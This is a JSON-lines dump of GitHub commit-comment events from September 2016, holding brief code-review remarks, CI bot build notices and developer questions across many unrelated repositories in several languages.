{"id":"4516531940","type":"CommitCommentEvent","actor":{"login":"mhooby"},"repo":{"name":"sbituc/magicroundabout"},"payload":{"comment":{"id":18899226,"position":23,"line":16,"path":"pom.xml","commit_id":"b708a0b870a938f4c23b11cd45fe8c66bcf60d84","created_at":"2016-09-05T11:55:12Z","updated_at":"2016-09-05T11:55:12Z","body":" <dependency>\r\n    \t\t<groupId>org.jxmapviewer</groupId>\r\n    \t\t<artifactId>jxmapviewer2</artifactId>\r\n  \t\t<version>2.0</version>\r\n  \t</dependency>"}},"created_at":"2016-09-05T11:55:12Z"}
{"id":"4516531958","type":"CommitCommentEvent","actor":{"login":"hsluoyz"},"repo":{"name":"nmap/npcap"},"payload":{"comment":{"id":18899227,"position":null,"line":null,"path":null,"commit_id":"87b126d6c9887bb05f0164953f1eb89a4888c56e","created_at":"2016-09-05T11:55:12Z","updated_at":"2016-09-05T11:55:12Z","body":"Before we discuss about the Vista support, you have two ways:\r\n\r\n1. use Npcap ``0.08 r8``, this is the last version that supports Vista.\r\n2. upgrate to Win7, doesn't Windows support a free update?"}},"created_at":"2016-09-05T11:55:12Z"}
{"id":"4516532153","type":"CommitCommentEvent","actor":{"login":"ahdinosaur"},"repo":{"name":"pietgeursen/pull-dom-mutants"},"payload":{"comment":{"id":18899228,"position":null,"line":null,"path":null,"commit_id":"c4dc252adf199c67559f86326831706d8a092291","created_at":"2016-09-05T11:55:14Z","updated_at":"2016-09-05T11:55:14Z","body":"no problem, i found it helpful (since i used to do all of those steps manually) so keen to pass on the knowledge. :globe_with_meridians: "}},"created_at":"2016-09-05T11:55:14Z"}
{"id":"4516533244","type":"CommitCommentEvent","actor":{"login":"leofeyer"},"repo":{"name":"contao/core"},"payload":{"comment":{"id":18899231,"position":null,"line":null,"path":null,"commit_id":"c1e72c563bee6d95661cfacd6e7867d08bbd363e","created_at":"2016-09-05T11:55:30Z","updated_at":"2016-09-05T11:55:30Z","body":"Changed in 08189923c2b2841985ab5d4b6fe7e37d5032e67c."}},"created_at":"2016-09-05T11:55:30Z"}
{"id":"4516534550","type":"CommitCommentEvent","actor":{"login":"fythatthep3"},"repo":{"name":"maierfelix/POGOserver"},"payload":{"comment":{"id":18899236,"position":null,"line":null,"path":null,"commit_id":"5d7519929eb987c6a5418d39e5bbd8faa15b5aa5","created_at":"2016-09-05T11:55:51Z","updated_at":"2016-09-05T11:55:51Z","body":"still wait... TT"}},"created_at":"2016-09-05T11:55:51Z"}
{"id":"4516535034","type":"CommitCommentEvent","actor":{"login":"schebotarev"},"repo":{"name":"Barrokgl/Polka"},"payload":{"comment":{"id":18899240,"position":27,"line":31,"path":"routes/book.js","commit_id":"86548c6d52066692cba7ca677eb042d72bb0b85e","created_at":"2016-09-05T11:55:59Z","updated_at":"2016-09-05T11:55:59Z","body":"на либы лучше ссылаться по абсолютным путям, чтобы не меня данный код каждый раз при перемещении данного файла"}},"created_at":"2016-09-05T11:55:59Z"}
{"id":"4516535389","type":"CommitCommentEvent","actor":{"login":"cy6erGn0m"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18899241,"position":null,"line":null,"path":null,"commit_id":"683b5f315c33370a8357809b5aeb35650a7a44ec","created_at":"2016-09-05T11:56:04Z","updated_at":"2016-09-05T11:56:04Z","body":"Why do we need `kotlin.collections.AbstractList` on JVM ?"}},"created_at":"2016-09-05T11:56:04Z"}
{"id":"4516538534","type":"CommitCommentEvent","actor":{"login":"ly29"},"repo":{"name":"nortikin/sverchok"},"payload":{"comment":{"id":18899246,"position":null,"line":null,"path":null,"commit_id":"c86190f96bf659deb6c0de3bf52cdfdf3c8cf665","created_at":"2016-09-05T11:56:55Z","updated_at":"2016-09-05T11:56:55Z","body":"So we changed it be python 3.4 compatible."}},"created_at":"2016-09-05T11:56:55Z"}
{"id":"4516540595","type":"CommitCommentEvent","actor":{"login":"anjaliraturi7452"},"repo":{"name":"anjaliraturi7452/anjali.github.io"},"payload":{"comment":{"id":18899249,"position":null,"line":null,"path":null,"commit_id":"217a91739160f20ed033d11ccb41f41ddd5335d5","created_at":"2016-09-05T11:57:28Z","updated_at":"2016-09-05T11:57:28Z","body":"delete it"}},"created_at":"2016-09-05T11:57:28Z"}
{"id":"4516541935","type":"CommitCommentEvent","actor":{"login":"kasperu"},"repo":{"name":"drfilth/drfilth"},"payload":{"comment":{"id":18899254,"position":null,"line":null,"path":null,"commit_id":"711d4389d9a0cde9730a490c880db87a148d07b3","created_at":"2016-09-05T11:57:49Z","updated_at":"2016-09-05T11:57:49Z","body":"C0py c4t xD"}},"created_at":"2016-09-05T11:57:49Z"}
{"id":"4516545315","type":"CommitCommentEvent","actor":{"login":"okitec"},"repo":{"name":"leletec/NameMemo"},"payload":{"comment":{"id":18899263,"position":null,"line":null,"path":null,"commit_id":"3d4fe439a2d5fd991e44b330932fe0a0592b4e00","created_at":"2016-09-05T11:58:46Z","updated_at":"2016-09-05T11:58:46Z","body":"Good riddance :clap: "}},"created_at":"2016-09-05T11:58:46Z"}
{"id":"4516545563","type":"CommitCommentEvent","actor":{"login":"Freezystem"},"repo":{"name":"reactjs/redux"},"payload":{"comment":{"id":18899264,"position":215,"line":213,"path":"docs/advanced/UsageWithReactRouter.md","commit_id":"2bb29a22d9e4c6fd214e30d3d3eea993e843e99d","created_at":"2016-09-05T11:58:49Z","updated_at":"2016-09-05T11:58:49Z","body":"Maybe it could be a good thing to link to the related repo here:\r\n> [*Redux Router*](https://github.com/acdlite/redux-router) is an experimental library, ...\r\n\r\nSame for:\r\n>[*React Router Redux*](https://github.com/reactjs/react-router-redux) creates binding between your redux app...\r\n\r\nThere are a lot of libs available and maybe more in a near future, so it will avoid to mislead developers. 😃 "}},"created_at":"2016-09-05T11:58:49Z"}
{"id":"4516548533","type":"CommitCommentEvent","actor":{"login":"porcospino"},"repo":{"name":"ucla/moodle-mod_zoom"},"payload":{"comment":{"id":18899268,"position":null,"line":null,"path":null,"commit_id":"29dafbd91162e3f647bf2ba338cf0414b0a49b5f","created_at":"2016-09-05T11:59:35Z","updated_at":"2016-09-05T11:59:35Z","body":"Hi\r\n\r\nPart of this change breaks the module on Moodle 2.7, specifically:\r\n\r\n```\r\n-        $this->add_intro_editor();\r\n+        $this->standard_intro_elements();\r\n```\r\nWe now get a fatal error: \r\n```\r\nPHP Fatal error:  Call to undefined method mod_zoom_mod_form::standard_intro_elements() in mod/zoom/mod_form.php on line 66\r\n```\r\nThis is because MDL-49101 was only fixed in Moodle 2.9, yet you do not require that version in version.php"}},"created_at":"2016-09-05T11:59:35Z"}
{"id":"4516549323","type":"CommitCommentEvent","actor":{"login":"ejphendriks"},"repo":{"name":"ejphendriks/hello_world"},"payload":{"comment":{"id":18899273,"position":null,"line":null,"path":null,"commit_id":"9348cbec600210d9496992ccacade4b7d1f03684","created_at":"2016-09-05T11:59:47Z","updated_at":"2016-09-05T11:59:47Z","body":"I like this formatting much better"}},"created_at":"2016-09-05T11:59:47Z"}
{"id":"4516549489","type":"CommitCommentEvent","actor":{"login":"Nxt3"},"repo":{"name":"ccrama/Slide"},"payload":{"comment":{"id":18899274,"position":null,"line":null,"path":null,"commit_id":"8022521f1fb14d7c7824a6437676901e60e873ed","created_at":"2016-09-05T11:59:49Z","updated_at":"2016-09-05T11:59:49Z","body":"What is the issue exactly?"}},"created_at":"2016-09-05T11:59:49Z"}
{"id":"4516550686","type":"CommitCommentEvent","actor":{"login":"mhooby"},"repo":{"name":"sbituc/magicroundabout"},"payload":{"comment":{"id":18899276,"position":23,"line":16,"path":"pom.xml","commit_id":"b708a0b870a938f4c23b11cd45fe8c66bcf60d84","created_at":"2016-09-05T12:00:10Z","updated_at":"2016-09-05T12:00:10Z","body":"dependency für Jxmapviewer"}},"created_at":"2016-09-05T12:00:10Z"}
{"id":"4516552753","type":"CommitCommentEvent","actor":{"login":"olleharstedt"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18899279,"position":null,"line":null,"path":null,"commit_id":"9d705d126fc919924ab08d120539de1fab37ecff","created_at":"2016-09-05T12:00:38Z","updated_at":"2016-09-05T12:00:38Z","body":"Yeah, will be merge conflict."}},"created_at":"2016-09-05T12:00:38Z"}
{"id":"4516555238","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":18899288,"position":null,"line":null,"path":null,"commit_id":"a74531171ad566f234384a13f673feb57a6e7c72","created_at":"2016-09-05T12:01:17Z","updated_at":"2016-09-05T12:01:17Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/382/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-1957)."}},"created_at":"2016-09-05T12:01:17Z"}
{"id":"4516558837","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18899294,"position":null,"line":null,"path":null,"commit_id":"7d86aa8c7ba2eecb184b666d64825f521d647788","created_at":"2016-09-05T12:02:11Z","updated_at":"2016-09-05T12:02:11Z","body":"TeamCity OTA+ :: rvi_sota_server :: migrations container [Build 50](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12540&buildTypeId=ota_plus_RviSotaServer_MigrationsContainer) is now running\n"}},"created_at":"2016-09-05T12:02:11Z"}
{"id":"4516560286","type":"CommitCommentEvent","actor":{"login":"Xylakant"},"repo":{"name":"marthjod/virtualenv-tools"},"payload":{"comment":{"id":18899298,"position":7,"line":95,"path":"virtualenv_tools.py","commit_id":"43f16e8c31d101586085001f283723819c424225","created_at":"2016-09-05T12:02:32Z","updated_at":"2016-09-05T12:02:32Z","body":"the size of the magic number is now 32 bytes. See one of the last comments on http://nedbatchelder.com/blog/200804/the_structure_of_pyc_files.html and the gist taken from the blog post https://gist.github.com/anonymous/35c08092a6eb70cdd723"}},"created_at":"2016-09-05T12:02:32Z"}
{"id":"4516565604","type":"CommitCommentEvent","actor":{"login":"shishuo119"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":18899311,"position":141,"line":141,"path":"huangyi/role/view.js","commit_id":"db962019134a8a0e608c8343611d15052afdd9fc","created_at":"2016-09-05T12:03:56Z","updated_at":"2016-09-05T12:03:56Z","body":"action的类型确定是string，所以可以写成`action === \"new\"`"}},"created_at":"2016-09-05T12:03:56Z"}
{"id":"4516565668","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18899312,"position":null,"line":null,"path":null,"commit_id":"7d86aa8c7ba2eecb184b666d64825f521d647788","created_at":"2016-09-05T12:03:57Z","updated_at":"2016-09-05T12:03:57Z","body":"TeamCity OTA+ :: rvi_sota_server :: migrations container [Build 50](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12540&buildTypeId=ota_plus_RviSotaServer_MigrationsContainer) outcome was **SUCCESS**\nSummary: Running Build time: 00:01:46"}},"created_at":"2016-09-05T12:03:57Z"}
{"id":"4516570961","type":"CommitCommentEvent","actor":{"login":"shishuo119"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":18899322,"position":152,"line":152,"path":"huangyi/role/view.js","commit_id":"db962019134a8a0e608c8343611d15052afdd9fc","created_at":"2016-09-05T12:05:19Z","updated_at":"2016-09-05T12:05:19Z","body":"` alert(msg || \"请求失败\")`后面没加分号`;`"}},"created_at":"2016-09-05T12:05:19Z"}
{"id":"4516574036","type":"CommitCommentEvent","actor":{"login":"shlevy"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18899326,"position":null,"line":null,"path":null,"commit_id":"8d977ead386cf29b8b395caca536bfaec9c36efe","created_at":"2016-09-05T12:06:08Z","updated_at":"2016-09-05T12:06:08Z","body":"@edolstra I mean we shouldn't move all the binaries from `/var/setuid-wrappers` to `/var/setuid-wrappers/bin`."}},"created_at":"2016-09-05T12:06:08Z"}
{"id":"4516576031","type":"CommitCommentEvent","actor":{"login":"CircuitCoder"},"repo":{"name":"CircuitCoder/Console-Lite"},"payload":{"comment":{"id":18899328,"position":null,"line":null,"path":null,"commit_id":"ad429ca8462366eb82f271fd24ecc2d566fc1c29","created_at":"2016-09-05T12:06:40Z","updated_at":"2016-09-05T12:06:40Z","body":"Fixes #2 #3 "}},"created_at":"2016-09-05T12:06:40Z"}
{"id":"4516576537","type":"CommitCommentEvent","actor":{"login":"thekiba"},"repo":{"name":"yegorf1/RogueBot"},"payload":{"comment":{"id":18899329,"position":113,"line":113,"path":"rooms/special/gabe.py","commit_id":"3d034368ae434730cc99958ac80fc6aad483b566","created_at":"2016-09-05T12:06:48Z","updated_at":"2016-09-05T12:06:48Z","body":"Гейб в диалоге говорит, что выдается 1000 золота, но оно не добавляется. Так и должно быть?"}},"created_at":"2016-09-05T12:06:48Z"}
{"id":"4516578599","type":"CommitCommentEvent","actor":{"login":"robcore"},"repo":{"name":"mkaluza/Samsung_STE_Kernel"},"payload":{"comment":{"id":18899331,"position":null,"line":null,"path":null,"commit_id":"be6d5ad419c6f6d72ca83e135b7d15613ae0d36c","created_at":"2016-09-05T12:07:22Z","updated_at":"2016-09-05T12:07:22Z","body":"It's something I think should be discussed in private for now ; ) I want to build an app you see... https://github.com/doubledutch/LazyJSON"}},"created_at":"2016-09-05T12:07:22Z"}
{"id":"4516579330","type":"CommitCommentEvent","actor":{"login":"soulfrost"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18899333,"position":null,"line":null,"path":null,"commit_id":"ed904e952efe67557174c450281f275fee8040ea","created_at":"2016-09-05T12:07:33Z","updated_at":"2016-09-05T12:07:33Z","body":"https://github.com/TrinityCore/TrinityCore/commit/fea0cb16f2e73ec21891ac14cdc10d9d8f518cfe#commitcomment-18655702\r\n\r\nafter 20 days, lol "}},"created_at":"2016-09-05T12:07:33Z"}
{"id":"4516587115","type":"CommitCommentEvent","actor":{"login":"jdiegogonzales"},"repo":{"name":"node-opcua/node-opcua"},"payload":{"comment":{"id":18899346,"position":null,"line":null,"path":null,"commit_id":"8f1d7455091ed3768561cad1683322f7d5cc8230","created_at":"2016-09-05T12:09:41Z","updated_at":"2016-09-05T12:09:41Z","body":"Many thanks for this amazing piece of software @erossignon.\r\n\r\nI want to help solve this. One idea is that, in the meantime, we can hide the message or make it less obstruvise?\r\n\r\nOtherwise I would like to know what documentation I can read or what I should be familiar with to make a proper pull request solving issue #190.\r\n\r\nThanks again. Regards"}},"created_at":"2016-09-05T12:09:41Z"}
{"id":"4516589781","type":"CommitCommentEvent","actor":{"login":"krakel"},"repo":{"name":"MyM-ModpackTeam/hypovolemia"},"payload":{"comment":{"id":18899348,"position":null,"line":null,"path":null,"commit_id":"c11d3bda0a48eb058ac3afd0208e4c540d0c6850","created_at":"2016-09-05T12:10:24Z","updated_at":"2016-09-05T12:10:24Z","body":"You have to do the same for castBroadAxeHead and castExcahatorHead!\r\nhttps://github.com/MyM-ModpackTeam/hypovolemia/issues/371#issuecomment-244730998"}},"created_at":"2016-09-05T12:10:24Z"}
{"id":"4516589993","type":"CommitCommentEvent","actor":{"login":"ysangkok"},"repo":{"name":"skyjake/Doomsday-Engine"},"payload":{"comment":{"id":18899349,"position":null,"line":null,"path":null,"commit_id":"d26b297e1c18398c2294046adf9cfe49564694da","created_at":"2016-09-05T12:10:28Z","updated_at":"2016-09-05T12:10:28Z","body":"Is it a SIGSEGV? How does the backtrace look like?"}},"created_at":"2016-09-05T12:10:28Z"}
{"id":"4516591934","type":"CommitCommentEvent","actor":{"login":"ml054"},"repo":{"name":"ayende/ravendb"},"payload":{"comment":{"id":18899356,"position":4,"line":23,"path":"test/FastTests/Server/Documents/Notifications/ChangesTests.cs","commit_id":"a3faefc4a478f320a07f17e62ba5eee81452fc2a","created_at":"2016-09-05T12:10:56Z","updated_at":"2016-09-05T12:10:56Z","body":"It was already reported:\r\n\r\nhttp://issues.hibernatingrhinos.com/issue/RavenDB-5166"}},"created_at":"2016-09-05T12:10:56Z"}
{"id":"4516592406","type":"CommitCommentEvent","actor":{"login":"shishuo119"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":18899359,"position":166,"line":166,"path":"huangyi/role/view.js","commit_id":"db962019134a8a0e608c8343611d15052afdd9fc","created_at":"2016-09-05T12:11:03Z","updated_at":"2016-09-05T12:11:03Z","body":"`for`循环换成`$$each`，是不是更好？"}},"created_at":"2016-09-05T12:11:03Z"}
{"id":"4516603627","type":"CommitCommentEvent","actor":{"login":"rtholmes"},"repo":{"name":"ubccpsc/310"},"payload":{"comment":{"id":18899387,"position":null,"line":null,"path":null,"commit_id":"dddf21d6092f244c2ab0ae94762139fd3b01de57","created_at":"2016-09-05T12:13:54Z","updated_at":"2016-09-05T12:13:54Z","body":"No labs during the first week. Readme updated."}},"created_at":"2016-09-05T12:13:54Z"}
{"id":"4516608062","type":"CommitCommentEvent","actor":{"login":"shishuo119"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":18899397,"position":181,"line":181,"path":"huangyi/role/view.js","commit_id":"db962019134a8a0e608c8343611d15052afdd9fc","created_at":"2016-09-05T12:15:04Z","updated_at":"2016-09-05T12:15:04Z","body":"e,vm分别指的是啥呀？"}},"created_at":"2016-09-05T12:15:04Z"}
{"id":"4516608710","type":"CommitCommentEvent","actor":{"login":"Gandhyman"},"repo":{"name":"Gandhyman/Space_Shooter"},"payload":{"comment":{"id":18899400,"position":null,"line":null,"path":null,"commit_id":"95712585f14aeae28c462d0d22ca0a8f67fb99a5","created_at":"2016-09-05T12:15:14Z","updated_at":"2016-09-05T12:15:14Z","body":"\r\n\r\n\r\n\r\n\r\n[MyPrefabs.zip](https://github.com/Gandhyman/Space_Shooter/files/455024/MyPrefabs.zip)\r\n"}},"created_at":"2016-09-05T12:15:14Z"}
{"id":"4516610184","type":"CommitCommentEvent","actor":{"login":"Alexey71"},"repo":{"name":"CyanogenMod/android_kernel_xiaomi_msm8956"},"payload":{"comment":{"id":18899404,"position":null,"line":null,"path":null,"commit_id":"13eea0c9d5d6e0e9ae78a78b19b5c5de4cd3783f","created_at":"2016-09-05T12:15:34Z","updated_at":"2016-09-05T12:15:34Z","body":"What's the problem ?. A month passed, the patch can not add\r\nhttps://github.com/TheStrix/android_kernel_xiaomi_msm8956/pull/3/commits/25c5bd8768ea34c616e758147dd768051dac0da0\r\nor \r\nhttps://github.com/TheStrix/android_kernel_xiaomi_msm8956/pull/4/commits/63788b53abfea0def79f0f42d2e03a63d8d1e1ac"}},"created_at":"2016-09-05T12:15:34Z"}
{"id":"4516612432","type":"CommitCommentEvent","actor":{"login":"Gandhyman"},"repo":{"name":"Gandhyman/Space_Shooter"},"payload":{"comment":{"id":18899413,"position":null,"line":null,"path":null,"commit_id":"95712585f14aeae28c462d0d22ca0a8f67fb99a5","created_at":"2016-09-05T12:16:09Z","updated_at":"2016-09-05T12:16:09Z","body":"Prefabs de los 3 asteroides y el laser de este juego"}},"created_at":"2016-09-05T12:16:09Z"}
{"id":"4516614445","type":"CommitCommentEvent","actor":{"login":"mustdobetter"},"repo":{"name":"c3limited/Magento-SMTP-Pro-Email-Extension"},"payload":{"comment":{"id":18899416,"position":null,"line":null,"path":null,"commit_id":"02ded0529cf2e82d54cbd8d7c12ce89d2ab8976c","created_at":"2016-09-05T12:16:39Z","updated_at":"2016-09-05T12:16:39Z","body":"There is a typo in the continue statement: \"contiue\"."}},"created_at":"2016-09-05T12:16:39Z"}
{"id":"4516619223","type":"CommitCommentEvent","actor":{"login":"glebovmaksim"},"repo":{"name":"glebovmaksim/django-treebeard"},"payload":{"comment":{"id":18899426,"position":null,"line":null,"path":null,"commit_id":"4c773adcb30de58fd2011158eeb868f314d6fc83","created_at":"2016-09-05T12:17:52Z","updated_at":"2016-09-05T12:17:52Z","body":"Remove unnecessary import."}},"created_at":"2016-09-05T12:17:52Z"}
{"id":"4516621824","type":"CommitCommentEvent","actor":{"login":"Turing1887"},"repo":{"name":"Turing1887/ProjektA"},"payload":{"comment":{"id":18899433,"position":null,"line":null,"path":null,"commit_id":"df9295f75ff2faaf8c81ac24ce6ef235b2aeaea9","created_at":"2016-09-05T12:18:31Z","updated_at":"2016-09-05T12:18:31Z","body":"### Anmerkung\r\nIch habe mir als Alternative zu dem Wort \"würfeln\" etwas bei einem Kommilitonen abgeguckt bei dem sie es scheinbar gut fanden. Deshalb habe ich das Wort \"virtuell\" davor gesetzt. Ab jetzt nenne ich es eine \"Generierung zufälliger Werte\".  "}},"created_at":"2016-09-05T12:18:31Z"}
{"id":"4516622111","type":"CommitCommentEvent","actor":{"login":"ricardomatias"},"repo":{"name":"bpmn-io/dmn-js"},"payload":{"comment":{"id":18899435,"position":124,"line":124,"path":"test/spec/features/date-edit/DateEditSpec.js","commit_id":"85f4b867822c04b8e71842e44db771707ecbc45e","created_at":"2016-09-05T12:18:35Z","updated_at":"2016-09-05T12:18:35Z","body":"[Please add a full integration test as this one](https://github.com/bpmn-io/dmn-js/blob/edf0d8cf6d898219867f2dad15038b90f18d2b3b/test/spec/features/number-edit/NumberEditSpec.js#L34)"}},"created_at":"2016-09-05T12:18:35Z"}
{"id":"4516622645","type":"CommitCommentEvent","actor":{"login":"nirvn"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":18899437,"position":null,"line":null,"path":null,"commit_id":"5c3a43e286684c5444e5a10eaea9ae3c8ba4a8c6","created_at":"2016-09-05T12:18:44Z","updated_at":"2016-09-05T12:18:44Z","body":"Yay!"}},"created_at":"2016-09-05T12:18:44Z"}
{"id":"4516624288","type":"CommitCommentEvent","actor":{"login":"mustdobetter"},"repo":{"name":"c3limited/Magento-SMTP-Pro-Email-Extension"},"payload":{"comment":{"id":18899441,"position":null,"line":null,"path":null,"commit_id":"02ded0529cf2e82d54cbd8d7c12ce89d2ab8976c","created_at":"2016-09-05T12:19:10Z","updated_at":"2016-09-05T12:19:10Z","body":"Fixed in a8c720315938bb7d8e91ba3fad430d613befc466."}},"created_at":"2016-09-05T12:19:10Z"}
{"id":"4516627315","type":"CommitCommentEvent","actor":{"login":"bnomei"},"repo":{"name":"texnixe/kirby-clone-field"},"payload":{"comment":{"id":18899451,"position":null,"line":null,"path":null,"commit_id":"ad748af62d922d26452d479a56b61727d884cd35","created_at":"2016-09-05T12:19:54Z","updated_at":"2016-09-05T12:19:54Z","body":"i see. having a parent is only certain for humans but not for pages. :-)"}},"created_at":"2016-09-05T12:19:54Z"}
{"id":"4516627628","type":"CommitCommentEvent","actor":{"login":"15711331078"},"repo":{"name":"15711331078/lihaoshuai"},"payload":{"comment":{"id":18899452,"position":null,"line":null,"path":null,"commit_id":"68003d6af2d40ddee018cdcdc90165c711db96b5","created_at":"2016-09-05T12:20:00Z","updated_at":"2016-09-05T12:20:00Z","body":"-# lihaoshuai"}},"created_at":"2016-09-05T12:20:00Z"}
{"id":"4516628310","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"garbas/mozilla-releng"},"payload":{"comment":{"id":18899456,"position":null,"line":null,"path":null,"commit_id":"c585ce1e3fc6c2ba412288e6e8f9b364dabbfc6e","created_at":"2016-09-05T12:20:12Z","updated_at":"2016-09-05T12:20:12Z","body":"TaskCluster: @La0 does not have permission to trigger tasks."}},"created_at":"2016-09-05T12:20:12Z"}
{"id":"4516628563","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"garbas/mozilla-releng"},"payload":{"comment":{"id":18899458,"position":null,"line":null,"path":null,"commit_id":"1e064245c65c2605145b0d0c16610253c61dc5c6","created_at":"2016-09-05T12:20:15Z","updated_at":"2016-09-05T12:20:15Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#IOv7cGt9SQ2uk0ByhS4PCw"}},"created_at":"2016-09-05T12:20:15Z"}
{"id":"4516628937","type":"CommitCommentEvent","actor":{"login":"laskoviymishka"},"repo":{"name":"angular/angular"},"payload":{"comment":{"id":18899459,"position":5,"line":43,"path":"modules/@angular/core/src/application_module.ts","commit_id":"b9647b734741346bf044c3c2c7c3ae3fe538fb46","created_at":"2016-09-05T12:20:18Z","updated_at":"2016-09-05T12:20:18Z","body":"Does this opaque token are supposed to re-register by end user to read actual browser locale? \r\nWhy not `{provide: LOCALE_ID, useFactory: () => navigator.userLanguage || navigator.language || 'en-US'`."}},"created_at":"2016-09-05T12:20:18Z"}
{"id":"4516629696","type":"CommitCommentEvent","actor":{"login":"15711331078"},"repo":{"name":"15711331078/lihaoshuai"},"payload":{"comment":{"id":18899460,"position":null,"line":null,"path":null,"commit_id":"68003d6af2d40ddee018cdcdc90165c711db96b5","created_at":"2016-09-05T12:20:29Z","updated_at":"2016-09-05T12:20:29Z","body":"-# lihaoshuai"}},"created_at":"2016-09-05T12:20:29Z"}
{"id":"4516630288","type":"CommitCommentEvent","actor":{"login":"minhoryang"},"repo":{"name":"jhl1214/Sogang-Pintos-OS"},"payload":{"comment":{"id":18899466,"position":null,"line":null,"path":null,"commit_id":"c12b4ee7c1f9e2948a8703737a740f61be477d6a","created_at":"2016-09-05T12:20:38Z","updated_at":"2016-09-05T12:20:38Z","body":"?!"}},"created_at":"2016-09-05T12:20:38Z"}
{"id":"4516630575","type":"CommitCommentEvent","actor":{"login":"RReverser"},"repo":{"name":"TomBebb/llvm-rs"},"payload":{"comment":{"id":18899468,"position":null,"line":null,"path":null,"commit_id":"3df656f777466a0870cad1b8089d979cdbd0c95e","created_at":"2016-09-05T12:20:41Z","updated_at":"2016-09-05T12:20:41Z","body":"It looks like this reverted additions from https://github.com/TomBebb/llvm-rs/commit/936964e86ab28798b1ff55544b47743940a4ccc1."}},"created_at":"2016-09-05T12:20:41Z"}
{"id":"4516631867","type":"CommitCommentEvent","actor":{"login":"jindaxia"},"repo":{"name":"HearthSim/Hearthstone-Deck-Tracker"},"payload":{"comment":{"id":18899471,"position":null,"line":null,"path":null,"commit_id":"a4f2379a745b154bb7b16c4f69e3049e1f8ffef7","created_at":"2016-09-05T12:21:01Z","updated_at":"2016-09-05T12:21:01Z","body":"complete?"}},"created_at":"2016-09-05T12:21:01Z"}
{"id":"4516632249","type":"CommitCommentEvent","actor":{"login":"mrkkrp"},"repo":{"name":"mrkkrp/text-metrics"},"payload":{"comment":{"id":18899473,"position":10,"line":82,"path":"cbits/text_metrics.c","commit_id":"1670bd495bb28666231391ac044a401fdbecde87","created_at":"2016-09-05T12:21:07Z","updated_at":"2016-09-05T12:21:07Z","body":"@alexbiehl, Thanks for the proposition. Perhaps we could indeed use `alloca` and add a warning to the docs about very long arguments?"}},"created_at":"2016-09-05T12:21:07Z"}
{"id":"4516634812","type":"CommitCommentEvent","actor":{"login":"grifon"},"repo":{"name":"quetzal19/mega-machinery"},"payload":{"comment":{"id":18899480,"position":1,"line":1,"path":"local/templates/.default/components/bitrix/news.list/wide-banners/template.php","commit_id":"6a9a95867820d8b8c6f06499d86872e4c5946112","created_at":"2016-09-05T12:21:43Z","updated_at":"2016-09-05T12:21:43Z","body":"Отформатируй код"}},"created_at":"2016-09-05T12:21:43Z"}
{"id":"4516646938","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"LuizAndrade/EDL"},"payload":{"comment":{"id":18899492,"position":null,"line":null,"path":null,"commit_id":"43b200fe8d915e33d3f66db3daacf8e70d1746c6","created_at":"2016-09-05T12:24:36Z","updated_at":"2016-09-05T12:24:36Z","body":"- Explicar a solução alternativa `fibonacci`.\r\n- Reconsiderar a discussão *readability vs writability*, parece que você está confundindo um com o outro.\r\n- Expandir a discussão de *Expressividade*, você não justificou ou deu exemplos..."}},"created_at":"2016-09-05T12:24:36Z"}
{"id":"4516650663","type":"CommitCommentEvent","actor":{"login":"zoic21"},"repo":{"name":"jeedom/core"},"payload":{"comment":{"id":18899497,"position":null,"line":null,"path":null,"commit_id":"7bcb087a83da2cddc6366ea5f7b2e076f268e7c9","created_at":"2016-09-05T12:25:32Z","updated_at":"2016-09-05T12:25:32Z","body":"Pas que j'ai eu le soucis sur du php 5.6 ( pas présent en 7.0)"}},"created_at":"2016-09-05T12:25:32Z"}
{"id":"4516650667","type":"CommitCommentEvent","actor":{"login":"juanibiapina"},"repo":{"name":"juanibiapina/functional_operations"},"payload":{"comment":{"id":18899498,"position":8,"line":58,"path":"README.md","commit_id":"cfd6a3fe1dc22f3f8622783959f15ab7e6370f1a","created_at":"2016-09-05T12:25:32Z","updated_at":"2016-09-05T12:25:32Z","body":"\"to the\" instead of \"in the\" ?"}},"created_at":"2016-09-05T12:25:32Z"}
{"id":"4516651543","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"igortouguinho/EDL"},"payload":{"comment":{"id":18899500,"position":null,"line":null,"path":null,"commit_id":"fdcbbc8565a325f71fcf05578f5f2376a038da14","created_at":"2016-09-05T12:25:46Z","updated_at":"2016-09-05T12:25:46Z","body":"Onde está o código fonte?"}},"created_at":"2016-09-05T12:25:46Z"}
{"id":"4516653793","type":"CommitCommentEvent","actor":{"login":"marceloboeira"},"repo":{"name":"juanibiapina/functional_operations"},"payload":{"comment":{"id":18899507,"position":8,"line":58,"path":"README.md","commit_id":"cfd6a3fe1dc22f3f8622783959f15ab7e6370f1a","created_at":"2016-09-05T12:26:21Z","updated_at":"2016-09-05T12:26:21Z","body":"I've seen both ways, but can change it. Just a sec."}},"created_at":"2016-09-05T12:26:21Z"}
